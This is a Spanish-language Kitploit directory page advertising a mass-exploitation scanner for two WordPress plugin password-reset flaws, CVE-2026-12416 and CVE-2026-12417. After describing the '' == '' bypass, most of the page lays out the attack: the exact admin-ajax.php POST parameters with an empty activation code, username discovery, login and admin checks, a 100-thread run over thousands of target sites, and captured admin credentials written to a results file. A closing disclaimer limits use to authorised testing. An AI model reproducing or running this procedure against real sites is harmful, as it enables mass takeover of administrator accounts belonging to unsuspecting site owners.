Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-12416-CVE-2026-12417 — Toma de control de cuenta no autenticada mediante una validación débil del restablecimiento de contraseña a través del parámetro 'reset_user_id' | Escalada de privilegios no autenticada mediante una validación débil del restablecimiento de contraseña a través de 'reset_activation_code' que conduce a la toma de control de la cuenta | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2026-12416-cve-2026-12417
Escáneres de VulnerabilidadesAtaques de ContraseñasExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticación
GitHubnxploited/cve-2026-12416-cve-2026-12417

CVE-2026-12416-CVE-2026-12417

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Ver Repositorio
2hace 1 mesAún no revisado

Toma de control de cuenta no autenticada mediante una validación débil del restablecimiento de contraseña a través del parámetro 'reset_user_id' | Escalada de privilegios no autenticada mediante una validación débil del restablecimiento de contraseña a través de 'reset_activation_code' que conduce a la toma de control de la cuenta

Compartir

CVE-2026-12416-CVE-2026-12417

Toma de control de cuenta no autenticada mediante validación débil de restablecimiento de contraseña a través del parámetro 'reset_user_id' | Escalada de privilegios no autenticada mediante validación débil de restablecimiento de contraseña a través de 'reset_activation_code' que conduce a la toma de control de cuenta

CVE-2026-12417 & CVE-2026-12416 — Escáner masivo

Por: Khaled Alenazi (Nxploited)


Vulnerabilidades

CVE-2026-12417 — SignUp & SignIn ≤ 1.0.0

Escalada de privilegios no autenticada mediante validación débil de restablecimiento de contraseña

CampoValor
CVSS9.8 Crítico
VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Publicado23 de junio de 2026
InvestigadorAlyudin Nafiie

La función pravel_change_password() está registrada como un manejador wp_ajax_nopriv — accesible sin autenticación. No realiza verificación de nonce ni comprobación de capacidades. La única protección es una comparación de igualdad débil entre el reset_activation_code proporcionado por el atacante y el valor de meta forgot_email del usuario. Para cualquier usuario que nunca haya activado un restablecimiento de contraseña, get_user_meta() devuelve una cadena vacía, lo que satisface trivialmente '' == '' cuando el código se omite o se envía vacío. Por lo tanto, un atacante no autenticado puede enviar un POST manipulado a admin-ajax.php con action=pravel_change_password, reset_user_id establecido en cualquier ID de usuario (incluidas las cuentas de administrador) y new_password_custom establecido en una contraseña arbitraria — logrando una toma de control total de la cuenta.


CVE-2026-12416 — Invoice Generator ≤ 1.0.0

Toma de control de cuenta no autenticada mediante validación débil de restablecimiento de contraseña

CampoValor
CVSS9.8 Crítico
VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Publicado23 de junio de 2026
InvestigadorAlyudin Nafiie

La función pravel_invoice_change_password() también está expuesta como un manejador AJAX nopriv sin nonce y sin comprobación de autorización. El mismo bypass '' == '' aplica: proporcionar un reset_activation_code vacío contra un administrador que nunca haya usado el flujo de contraseña olvidada concede un restablecimiento de contraseña inmediato. El atacante controla el objetivo mediante reset_user_id y la nueva credencial mediante new_password_custom.


Cómo funciona el escáner

root@kitploit:~
For each target site:

  1. AJAX Probe (fast path — IDs 1 and 2)
     POST /wp-admin/admin-ajax.php
       action=pravel_change_password        (CVE-2026-12417)
       action=pravel_invoice_change_password (CVE-2026-12416)
       reset_user_id=<id>
       new_password_custom=<fixed_password>
       reset_activation_code=              ← empty — bypasses the check

     Response on success:
       {"activation":true,"message":"Password has been changed successfully"}

  2. Username Resolution (lazy — only runs after confirmed reset)
     a. GET /wp-json/wp/v2/users/<id>     ← exact username for the reset ID
     b. "admin"                            ← always tried second
     c. GET /wp-json/wp/v2/users          ← REST API bulk list
     d. /?author=1..3 redirect            ← author archive scan

  3. Login Verification
     POST /wp-login.php
       log=<username>  pwd=<password>
     Check for wordpress_logged_in cookie.

  4. Admin Confirmation
     GET /wp-admin/users.php
     Requires list_users capability — administrators only.
     Any deny message or login redirect → not admin, skip.

  5. On Confirmed Admin
     Save to scan_results/pravel_admin_success.txt:
       SITE | LOGIN URL | user | pass | exploit | id
     Print result line to terminal.

  6. Extended Sweep (if IDs 1–2 both fail)
     Repeat steps 1–5 for user IDs 3 through 20.

Salida exitosa

Terminal:

root@kitploit:~
  [1/5000]  https://target.com          NO
  [2/5000]  https://victim.com          ADMIN=admin  pass=Nxploited@123KSa  exploit=pravel_change_password id=1 | https://victim.com/wp-login.php
  [3/5000]  https://another.com         NO

Archivo de resultados (scan_results/pravel_admin_success.txt):

root@kitploit:~
[2026-06-24 16:00:00] SITE=https://victim.com | LOGIN=https://victim.com/wp-login.php | user=admin | pass=Nxploited@123KSa | exploit=pravel_change_password | id=1

Uso

root@kitploit:~
python Cl.py

  Targets file (one URL per line) [targets.txt]: sites.txt
  Threads (concurrent sites) [50]: 100

Requisitos:

root@kitploit:~
pip install requests rich colorama urllib3

Descargo de responsabilidad

Esta herramienta se proporciona únicamente para investigación de seguridad autorizada y pruebas de penetración.
Usarla contra sistemas que no poseas o para los que no tengas permiso explícito por escrito es ilegal.
El autor no asume ninguna responsabilidad por el mal uso o los daños causados por esta herramienta.
Todos los detalles de los CVE provienen de bases de datos públicas de vulnerabilidades.


Por: Khaled Alenazi (Nxploited)

Descargar herramienta